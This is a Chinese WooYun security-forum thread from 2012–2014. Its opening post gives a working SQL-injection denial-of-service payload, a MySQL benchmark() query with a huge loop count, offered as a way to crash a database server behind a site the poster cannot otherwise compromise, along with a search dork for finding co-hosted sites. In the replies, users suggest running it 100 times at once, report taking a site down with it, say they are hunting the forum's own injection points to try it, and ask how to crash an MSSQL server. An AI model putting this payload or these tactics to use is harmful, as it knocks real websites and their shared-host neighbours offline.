当前位置:WooYun(白帽子技术社区) >> mysql >> 一条sql语句使sql服务器崩溃

一条sql语句使sql服务器崩溃

VIP (Fatal error: Call to undefined function getwb() in /data1/www/htdocs/106/wzone/1/index.php on line 10|@齐迹@小胖子@z7y@nauscript|昨晚做梦梦见了一个ecshop注射0day,醒来后忘记在哪了。|预留广告位) | 2012-10-10 17:01

修改自:http://yaseng.me/mysql-sql-injection-ddos.html

当有一个拿不下的站时,可能可以用上它。谷歌同服站点Site:wooyun.org inurl:*.php?
找到注入点后执行sql语句select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
同服的mysql驱动站就死了。。。。
---------------------------------
PS:话说。。在本机的apache+mysql测试了一下,结果。。。系统卡死了,mysql的进程CPU占用率有90多。。。

分享到:
29 个回复
  1. 1#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2012-10-10 17:08

    草,别啊~~~~

  2. 2#
    回复此人 感谢
    CHForce (带马师) | 2012-10-10 17:08

    貌似很强大的样子

  3. 3#
    回复此人 感谢
    三叶草 (一叶障目) | 2012-10-10 17:37

    收藏!

  4. 4#
    回复此人 感谢
    iv4n | 2012-10-10 18:07

    当年2哥帮忙测sql注入的时候用过

  5. 5#
    回复此人 感谢
    HuGtion | 2012-10-10 21:31

    貌似很强大的样子  收藏!

  6. 6#
    回复此人 感谢
    ttvip11 | 2012-10-10 21:49

    。。。。太猥琐了 -。-

  7. 7#
    回复此人 感谢
    Yaseng (看黄片 到 www.yaseng.org) | 2012-10-10 22:43

    呵呵  其实还可以更猥琐的    不过有些虚拟主机限制了      .....

  8. 8#
    回复此人 感谢
    z@cx (日复一日,年复一年) | 2012-10-11 10:41

    本地执行了下,CPU跑到20%,查询用时12秒多。。。

  9. 9#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2012-10-11 10:42

    @z@cx 那就开100个刷

  10. 10#
    回复此人 感谢
    z@cx (日复一日,年复一年) | 2012-10-11 11:39

    @xsser 额。。。

  11. 11#
    回复此人 感谢
    z7y (小胖子首席鉴黄师) | 2012-10-11 15:56

    @VIP  膜拜VIP好基友,请你吃了好丽友后....我们就变成基友了- -。

  12. 12#
    回复此人 感谢
    Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2012-10-12 16:45

    跪谢

  13. 13#
    回复此人 感谢
    wsh_mars | 2012-11-15 15:13

    直接Sleep不是更简单

  14. 14#
    回复此人 感谢
    z7y (小胖子首席鉴黄师) | 2012-11-15 17:08

    @VIP 啊啊啊啊啊啊啊,基友你好久没上QQ了啊~~~思念

  15. 15#
    回复此人 感谢
    0x2b | 2012-11-16 14:47

    我在寻找wooyun注射点。。 尝试使用本段sql语句

  16. 16#
    回复此人 感谢
    雅柏菲卡 (万物有灵,切忌污损。。。。。。) | 2013-06-02 22:33

    @0x2b 你骨头痒了  来人 将0x2b拖去慎刑司行刑

  17. 17#
    回复此人 感谢
    laterain | 2013-06-02 22:50

    延时注入专用,你却拿来dos,你浪费不啊。。

  18. 18#
    回复此人 感谢
    applychen | 2013-06-02 23:03

    windows平台用这条语句比较容易挂

  19. 19#
    回复此人 感谢
    齐迹 (sec.zhubajie.com 欢迎来撸) | 2013-06-03 08:46

    wooyun 是在sae上的 这个mysql函数是禁用的!无效的亲们!

  20. 20#
    回复此人 感谢
    Ivan (Null.) | 2013-07-02 15:09

    这个叼

  21. 21#
    回复此人 感谢
    半世倾尘 | 2013-07-02 15:33

    @Yaseng @z7y sql sever我用Bsql连上 怎么改不了数据 改了下然后等下他就变回去了 sa权限 求解

  22. 22#
    回复此人 感谢
    (我是脚本小子,我为z7y代言。) | 2013-07-03 15:31

    Ouch not bad this is j8

  23. 23#
    回复此人 感谢
    雅柏菲卡 (万物有灵,切忌污损。。。。。。) | 2013-08-25 14:50

    这貌似是压力测试

  24. 24#
    回复此人 感谢
    if、so | 2013-09-14 18:26

    @VIP 知道mssql怎么写会让数据库挂掉,因为我只有他启动项写权限,想让服务器重启

  25. 25#
    回复此人 感谢
    X,D | 2013-09-16 15:33

    真受其害!

  26. 26#
    回复此人 感谢
    juuxdd (["'<$ /_\> & ]) | 2013-09-16 15:44

    搞死了一个站,还不错!!

  27. 27#
    回复此人 感谢
    BlackYe. | 2013-09-16 17:00

    没搞死。。。

  28. 28#
    回复此人 感谢
    HackBraid | 2014-02-15 09:08

    @VIP同服站点跟网站备案是一会儿事儿吧?

  29. 29#
    回复此人 感谢
    jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2014-02-15 09:38

    @0x2b 你要祈祷疯狗手抖了!

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容

  • 暂无

Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1